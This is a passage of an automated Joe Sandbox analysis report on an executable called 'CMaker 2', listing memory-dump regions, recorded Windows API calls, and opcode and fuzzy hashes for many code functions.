                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1236291503-0
                                                                                                                                                                                  • Opcode ID: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction ID: 94a78f0cf88e467c4d106e3aec20244f6077ffdb98d14b7522bbcface01ac7b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF313D25E1820382FB14AB65E5913B91391AF47784FC490F9E93ECB2D7FE6CE8049741
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                  • Opcode ID: 25ddec7b9a332254016cf731a5ec0e9392247c67621e278a2717bb20b3dfaf36
                                                                                                                                                                                  • Instruction ID: ab9a7c306e30524ada4e81d655482320e9228264bf32b9fed585038a487422c9
• Opcode Fuzzy Hash: 25ddec7b9a332254016cf731a5ec0e9392247c67621e278a2717bb20b3dfaf36
• Instruction Fuzzy Hash: 1E31F536A18B858ADB108F15E5442A977B0FB1A780F884076EB5EC3B95FF3CD451CB00
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 0f9b56d894b59bf5b7e8383ca5e0cbe51dcfa835e806d662f5735474265d4d92
• Instruction ID: 8f9c13eb57b1dc536045943345398cc86d50a99d77232cf0eff2b97065dbff5e
• Opcode Fuzzy Hash: 0f9b56d894b59bf5b7e8383ca5e0cbe51dcfa835e806d662f5735474265d4d92
• Instruction Fuzzy Hash: 5A318426A18B4681DB608F58A5541796650FB47BB0FA8137DDB7E873E0DF38E9A1E300
APIs
• SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDF4
• GetLastError.KERNEL32(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDFE
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: ede5fc4d7b12468b8e87ad72fb039376ac055e7d4bec884aeb090efb761c461e
• Instruction ID: 260cdb23218bc496dc00b819130208203484408313b013ace6e31e54ca0b1c5c
• Opcode Fuzzy Hash: ede5fc4d7b12468b8e87ad72fb039376ac055e7d4bec884aeb090efb761c461e
• Instruction Fuzzy Hash: 58110166608A8185DB108B25E8000696361AB42BF4F984375EE7E8B7E9EF3CD0508700
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
• GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 042bc8721a3345eaabeb78b0f294181831f5ba70ab5432ae3c86ec800ea28b45
• Instruction ID: 71257476fbf18d79ce36eef1ef414b87ea737ca4733f86ee20adad4ceded9e5e
• Opcode Fuzzy Hash: 042bc8721a3345eaabeb78b0f294181831f5ba70ab5432ae3c86ec800ea28b45
• Instruction Fuzzy Hash: FCE08C54F2920686FF08AFF2D84A03916A45F86B40F8890B8C92EC62D2FE2C69918310
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA74E
• GetLastError.KERNEL32(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA758
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: fa9ac4c151c8ebe2f15a9508e0179b12dcacbbb1569cdd32a455063ae332efe8
• Instruction ID: 69abfc3edcffe8d1dd67eb7298bdbcb29d1ed8a6084e6d602a51513fb45ae67f
• Opcode Fuzzy Hash: fa9ac4c151c8ebe2f15a9508e0179b12dcacbbb1569cdd32a455063ae332efe8
• Instruction Fuzzy Hash: D721F615B1C64241FF5497E5A49027916A25F86BA0F8C82BDDA3EC77D3FE6CB4454300
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: bd077d8a5a7c03cd002072d8ca953402e38cbe5d3df466adb21d87e7869545d0
• Instruction ID: 457d91623bbe1a8170b164b8524305621adeb3c4244010a7fc4349c327bc68e7
• Opcode Fuzzy Hash: bd077d8a5a7c03cd002072d8ca953402e38cbe5d3df466adb21d87e7869545d0
• Instruction Fuzzy Hash: 1F41E536A18205CBEB288B59E55027973A0EB57B80F980178D7AEC36D5EF2DE402C751
APIs
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
• Instruction ID: 32f2e68cef169bb4771cd13c6f4a8025e42c60b6f2906e4823994db3b39f4d41
• Opcode Fuzzy Hash: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
• Instruction Fuzzy Hash: 6231C432B082428AE7B69EA5946037D77ADEF4CB44F588435DE09A7E85CF3DE842C740
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 601036bb13c35aa651461849481dfd61c6a86d1eed7095f1acf94c7b8a200795
• Instruction ID: 04ab0b4fa61bd5dcff72f4a47117141f28c4c77c5aacc3cc9d37692d7580e5a0
• Opcode Fuzzy Hash: 601036bb13c35aa651461849481dfd61c6a86d1eed7095f1acf94c7b8a200795
• Instruction Fuzzy Hash: 8221BF25B0829245FB149B6268943BA9651BF4ABC4FCC50F0EE2C8B7C6EE7CE841C200
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction ID: c9e9998d5ed24129563c22849d9ffcb48eea977f65cdc66d5a01b76ebced5f7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60318126A286129AFB116F95CC4137C6A50AF42B94FC941B9D93D933D2EF7CE4418710
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                  • Opcode ID: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction ID: 317aa114d44f643121f157184ce81799ab20b9a7db8569d78d376a244af95e21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21923AE0474689EB249FA4C4402FC33A0FB49718F98467ADB2D87AC9EF38D544C780
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction ID: 028fac1dce5106bc847249e952b8ff20d19388232c66c18b125eeeb49f4bc5cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511C32DA2E64281EF209F91D40067DA668BF87B80FCC4179EB6C97AC6EF3CD4108700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction ID: 8bd48880803b86f2f387b8c157bbccada6e1ca8bf7faf4e197f78a48c96637f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA218172A18A4287DB61CF58E44037976B0EB84B94F589274EAADC76DAFF7DD4008B00
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction ID: d2e8a9e5d977c947a657a9c427837112b747ae5b647d703ec3207a73020cad26
                                                                                                                                                                                  • Opcode Fuzzy Hash: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801C865A1878241EB04DB529940079AA95BF86FE0F8C82B4DE7C97BD6EF7CE4018700
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7800: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FABE31D4,00000000,00007FF6FABE1905), ref: 00007FF6FABE7839
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00007FF6FABE4E66,?,00007FF6FABE224E), ref: 00007FF6FABE73F2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2592636585-0
                                                                                                                                                                                  • Opcode ID: af771f94276a2da18c982809e64c012f6bb03a559007e2af513c6c52247235dc
                                                                                                                                                                                  • Instruction ID: 01451ad13b7ed85c07e65821b1a050b7de93028f814fe1ec32cf0e7c507ad3d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: af771f94276a2da18c982809e64c012f6bb03a559007e2af513c6c52247235dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD0C201F2428141FB44E7A7BA4653951629FCABC0F9CD075EE2E83B86EC3CC0804B00
APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6FABEB290
  • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6FABEBCC0
  • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6FABEBCC5
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
• String ID:
• API String ID: 1208906642-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF6FABFAEAA,?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012), ref: 00007FF6FABFEBD9
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
Similarity
• API ID: 00007A4331
• String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
• API String ID: 148622186-4109427827
APIs
Memory Dump Source
• Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
Similarity
• API ID: 00007A43319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 212611557-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2263462576.00007FFD93481000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93480000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd93480000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
